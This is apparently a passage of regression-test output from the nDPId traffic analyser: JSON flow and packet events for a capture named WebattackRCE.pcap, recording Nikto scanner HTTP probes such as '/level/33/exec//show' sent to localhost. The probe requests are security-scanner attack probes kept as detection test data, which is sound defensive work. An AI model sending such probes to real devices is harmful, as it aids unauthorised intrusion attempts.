{"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/32\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001279)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":581,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":581,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277609,"flow_last_seen":1576420277609,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277609,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50724,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":581,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":581,"flow_packet_id":1,"flow_last_seen":1576420277609,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277609,"pkt":"AAAAAAAAAAAAAAAACABFAADIVW1AAEAG5sB\/AAABfwAAAcYkH5Dpym2S0+8SfoAYAED+vAAAAQEICp1m\/pGdZv6RR0VUIC9sZXZlbC8zMy9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjgwKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
+01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":581,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":581,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277609,"flow_last_seen":1576420277609,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277609,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50724,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/33\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001280)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":582,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":582,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277611,"flow_last_seen":1576420277611,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277611,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50726,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":582,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":582,"flow_packet_id":1,"flow_last_seen":1576420277611,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277611,"pkt":"AAAAAAAAAAAAAAAACABFAADIEPFAAEAGKz1\/AAABfwAAAcYmH5CKoygWHO02yYAYAED+vAAAAQEICp1m\/pOdZv6TR0VUIC9sZXZlbC8zNC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyODEpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":582,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":582,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277611,"flow_last_seen":1576420277611,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277611,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50726,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/34\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001281)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":583,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":583,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277612,"flow_last_seen":1576420277612,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277612,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50728,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":583,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":583,"flow_packet_id":1,"flow_last_seen":1576420277612,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277612,"pkt":"AAAAAAAAAAAAAAAACABFAADILGdAAEAGD8d\/AAABfwAAAcYoH5DpvhSfS8jZeYAYAED+vAAAAQEICp1m\/pSdZv6UR0VUIC9sZXZlbC8zNS9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyODIpDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":583,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":583,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277612,"flow_last_seen":1576420277612,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277612,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50728,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": 
{"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/35\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001282)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":584,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":584,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277614,"flow_last_seen":1576420277614,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277614,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50730,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":584,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":584,"flow_packet_id":1,"flow_last_seen":1576420277614,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277614,"pkt":"AAAAAAAAAAAAAAAACABFAADIgnNAAEAGubp\/AAABfwAAAcYqH5AJ3LqL6hJPloAYAED+vAAAAQEICp1m\/pWdZv6VR0VUIC9sZXZlbC8zNi9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyODMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} 
+01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":584,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":584,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277614,"flow_last_seen":1576420277614,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277614,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50730,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/36\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001283)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":585,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":585,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277615,"flow_last_seen":1576420277615,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277615,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50732,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":585,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":585,"flow_packet_id":1,"flow_last_seen":1576420277615,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277615,"pkt":"AAAAAAAAAAAAAAAACABFAADIj29AAEAGrL5\/AAABfwAAAcYsH5DrNbeX8ap25oAYAED+vAAAAQEICp1m\/pedZv6XR0VUIC9sZXZlbC8zNy9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjg0KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":585,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":585,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277615,"flow_last_seen":1576420277615,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277615,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50732,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/37\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001284)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":586,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":586,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277616,"flow_last_seen":1576420277616,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277616,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50734,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":586,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":586,"flow_packet_id":1,"flow_last_seen":1576420277616,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277616,"pkt":"AAAAAAAAAAAAAAAACABFAADImrpAAEAGoXN\/AAABfwAAAcYuH5CDY6JF2zT1KYAYAED+vAAAAQEICp1m\/pidZv6YR0VUIC9sZXZlbC8zOC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyODUpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":586,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":586,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277616,"flow_last_seen":1576420277616,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277616,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50734,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": 
{"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/38\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001285)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":587,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":587,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277618,"flow_last_seen":1576420277618,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277618,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50736,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":587,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":587,"flow_packet_id":1,"flow_last_seen":1576420277618,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277618,"pkt":"AAAAAAAAAAAAAAAACABFAADIUbFAAEAG6nx\/AAABfwAAAcYwH5C3PmlUu95eg4AYAED+vAAAAQEICp1m\/pqdZv6aR0VUIC9sZXZlbC8zOS9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyODYpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} 
+01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":587,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":587,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277618,"flow_last_seen":1576420277618,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277618,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50736,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/39\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001286)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":588,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":588,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277619,"flow_last_seen":1576420277619,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277619,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50738,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":588,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":588,"flow_packet_id":1,"flow_last_seen":1576420277619,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277619,"pkt":"AAAAAAAAAAAAAAAACABFAADI5L9AAEAGV25\/AAABfwAAAcYyH5D7t9xCdJSM64AYAED+vAAAAQEICp1m\/pudZv6bR0VUIC9sZXZlbC80MC9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjg3KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":588,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":588,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277619,"flow_last_seen":1576420277619,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277619,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50738,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/40\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001287)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":589,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":589,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277622,"flow_last_seen":1576420277622,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277622,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50740,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":589,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":589,"flow_packet_id":1,"flow_last_seen":1576420277622,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277622,"pkt":"AAAAAAAAAAAAAAAACABFAADIjX9AAEAGrq5\/AAABfwAAAcY0H5DiALWBzWdeg4AYAED+vAAAAQEICp1m\/p6dZv6eR0VUIC9sZXZlbC80MS9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyODgpDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":589,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":589,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277622,"flow_last_seen":1576420277622,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277622,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50740,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": 
{"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/41\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001288)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":590,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":590,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277624,"flow_last_seen":1576420277624,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277624,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50742,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":590,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":590,"flow_packet_id":1,"flow_last_seen":1576420277624,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277624,"pkt":"AAAAAAAAAAAAAAAACABFAADIagJAAEAG0it\/AAABfwAAAcY2H5Bh+1L\/IgWJKIAYAED+vAAAAQEICp1m\/p+dZv6fR0VUIC9sZXZlbC80Mi9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyODkpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} 
+01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":590,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":590,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277624,"flow_last_seen":1576420277624,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277624,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50742,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/42\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001289)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":591,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":591,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277625,"flow_last_seen":1576420277625,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277625,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50744,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":591,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":591,"flow_packet_id":1,"flow_last_seen":1576420277625,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277625,"pkt":"AAAAAAAAAAAAAAAACABFAADI3axAAEAGXoF\/AAABfwAAAcY4H5AuBeVV4Hsa\/oAYAED+vAAAAQEICp1m\/qGdZv6hR0VUIC9sZXZlbC80My9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyOTApDQoNCg=="} 